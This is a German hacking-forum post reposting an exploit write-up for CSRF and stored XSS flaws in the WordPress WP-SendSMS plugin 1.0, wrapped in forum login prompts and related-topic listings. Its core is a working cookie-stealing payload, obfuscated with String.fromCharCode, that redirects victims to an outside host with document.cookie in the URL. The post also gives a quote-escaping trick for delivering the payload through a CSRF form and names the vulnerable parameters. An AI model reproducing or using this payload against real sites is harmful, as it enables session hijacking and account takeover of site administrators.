Wordpress WP-SendSMS Plugin 1.0 Multiple Vulnerabilities

Als Gast hast du nur eingeschränkten Zugriff!

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

Antworte auf Themen oder erstelle deine eigenen.
Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.

Wordpress WP-SendSMS plugin 1.0 suffers from CSRF and Stored XSS vulnerabilities.
Interesting thing is Stored XSS + CSRF combination, because of which, attacker can exploit CSRF vulnerability to Trigger Stored XSS, for stealing Cookies!!!!

So what I have done here is , crafted simple CSRF exploit page with Stored XSS payload as below :

Challenges:

1. Stored XSS was there but was not able to execute functions like document.cookie, alert() etc.
2. Storing XSS payload inside our CSRF exploit html page.

To bypass 1st challenge I had to use function "String.fromCharCode(ascii value)" and payload will look like :

"><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script>

Above payload will redirect victim to my website by attaching cookies in URL!!...

But when we put this payload inside value="XSS PAYLOAD" it will not work because it will be interpreted as value = ""><script>........ which actually sets your value="" instead of XSS payload to bypass this we can put " instead of " ... and this will be considered as valid XSS payload inside your CSRF exploit form.

For exploit please check :

Please Login HERE or Register HERE to see this link!

Stored XSS Details :

URL:

Please Login HERE or Register HERE to see this link!

Stored XSS Vulnerable Parameters:
1. sender_id
2. maximum_characters
3. captcha_width
4. captcha_height
4. captcha_characters

This is how Stored XSS can be exploited through CSRF which is effective attack, this is just for information purpose.

THX to
Please Login HERE or Register HERE to see this link!

Edited by Mr_NiceGuy, 13 June 2013 - 09:57 Uhr.

Topic	Forum	Started By	Stats	Last Post Info
J2EEScan 2.0.0 Beta is a plugin for Burp Suite Proxy.	Allgemein	vestas88	0 replies 2940 views	28 January 2020 - 06:18 Uhr By: vestas88
vulnerabilities.pro (Pastebin-Ersatz)	Zubehör	SecurityFlaw	2 replies 3243 views	23 July 2019 - 13:51 Uhr By: SecurityFlaw
Erfahrung mit untouched Wordpress Themes? wordpress, theme, plugin, premium and 1 more...	Web Coding	Irhabi	2 replies 3690 views	30 September 2018 - 22:55 Uhr By: Irhabi